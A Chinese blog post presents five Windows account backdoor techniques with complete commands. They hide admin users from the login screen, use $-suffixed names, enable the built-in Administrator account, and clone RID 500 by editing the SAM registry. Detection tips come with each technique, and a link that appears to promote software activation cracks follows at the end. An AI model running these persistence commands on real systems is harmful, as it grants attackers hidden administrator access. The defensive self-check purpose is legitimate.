这里我给大家介绍几种常见的Windows账号后门方法,这些方法在网上已经烂大街了,但可能有的人还不太了解。感兴趣的朋友看完后可以自查一下,看看有没有中标。
一、在登陆界面隐藏用户
net user test This1s@pass /add net localgroup administrators test /add reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v test /d 0 /f以上添加了管理员用户test,并在登陆界面中隐藏。正常状态下登陆界面左下角是不显示隐藏用户的:
猥琐指数:*
隐藏效果:
1)在登录界面中隐藏。
2)对net user命令不隐藏。
3)对net localgroup users命令不隐藏。
4)对netplwiz.exe隐藏。
5)对lusrmgr.msc不隐藏。
防护方法:
使用lusrmgr.msc及net user命令识别可疑用户。
二、在用户名末尾添加$
net user test$ This1s@pass /add net localgroup administrators test$ /add猥琐指数:* *
隐藏效果:
1)登录界面不隐藏。
2)对net user命令隐藏。
3)对net localgroup命令不隐藏。
4)对netplwiz.exe不隐藏。
5)对lusrmgr.msc不隐藏。
防护方法:
留意以$结尾的用户名,这很可能是黑客留的后门账号。
三、技术一 + 技术二
net user test$ This1s@pass /add net localgroup administrators test$ /add reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v test$ /d 0 /f猥琐指数:* * *
隐藏效果:
1)登录界面隐藏。
2)对net user命令隐藏。
3)对net localgroup命令不隐藏。
4)对netplwiz.exe不隐藏。
5)对lusrmgr.msc不隐藏。
防护方法:
留意以$结尾的用户名,这很可能是黑客留的后门账号。
四、启用默认的administrator用户,并在登陆界面隐藏
administrator用户在Windows中是默认禁用的,黑客可能偷偷启用并在登陆界面中隐藏:
net user administrator /active:yes net user administrator This1s@pass reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v aministrator /d 0 /f 猥琐指数:* * *
隐藏效果:
1)登录界面隐藏。
2)对net user命令不隐藏。
3)对net localgroup命令隐藏。
防护方法:
留意administrator是否被启用,可以考虑把它删除。
五、管理员用户身份劫持
这个方法的亮点在于,可以把任意指定用户的RID修改成管理员的RID(500),从而达到劫持管理员身份的效果。修改成功后,后门用户使用自己的密码进行登陆,但profile为被劫持用户的profile,基本不会受被劫持用户影响,即使被劫持用户被禁用,后门用户仍能正常登陆。
1)创建一个隐藏用户:
net user test$ This1s@pass /add2)通过regedit.exe或命令获得HKLM\sam注册表的控制权限,sam路径默认只有SYSTEM用户能访问:
最下面的复选框要钩上
3)查询注册表获得test用户的RID及需要修改的注册表位置,下面例子中user的RID为1007,对应的十六进制为EF03,其注册表路径为HKLM\sam\sam\domains\account\users\000003EF:
C:\Windows\system32>reg query HKLM\sam\sam\domains\account\users HKEY_LOCAL_MACHINE\sam\sam\domains\account\users (默认) REG_DWORD_BIG_ENDIAN HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000001F4 HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000001F5 HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000001F7 HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000001F8 HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000003E9 HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000003EF HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\Names C:\Windows\system32>reg query HKLM\sam\sam\domains\account\users\names /z /s HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names (默认) REG_NONE (0) HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\Administrator (默认) REG_NONE (500) HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\DefaultAccount (默认) REG_NONE (503) HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\Guest (默认) REG_NONE (501) HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\test$ (默认) REG_NONE (1007) HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\User (默认) REG_NONE (1001) HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\WDAGUtilityAccount (默认) REG_NONE (504) C:\Windows\system32>4)修改user用户的注册表,把键f值中的EF03改成F401,即为被劫持administrator用户的RID:
reg add HKLM\sam\sam\domains\account\users\000003EF /v f /t REG_BINARY /d 000003BED00000000EDE4FED000000000000000000000000F4010000000000000000000000000000000000000000000000000 /f
把test$用户从用户组中删除,不会影响权限:
net localgroup administrators test$ /del net localgroup users test$ /del猥琐指数:* * * *
隐藏效果:
1)登录界面隐藏。
2)对net user命令隐藏。
3)对net localgroup命令隐藏。
4)对netplwiz.exe不隐藏。
5)对lusrmgr.msc不隐藏。
6)可利用WDAGUtilityAccount、Guest等系统自带账号提高隐藏效果。
防护方法:
留意lusrmgr.msc中以$结尾的账号,以及处于启用状态的系统默认账号。
除了提到的这几种常见的方法,还有许多更猥琐的后门技术,这里就不多说了,你懂得。
觉得有用请点赞并加关注,谢谢!
2024最新激活全家桶教程,稳定运行到2099年,请移步至置顶文章:https://sigusoft.com/99576.html
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。 文章由激活谷谷主-小谷整理,转载请注明出处:https://sigusoft.com/16747.html
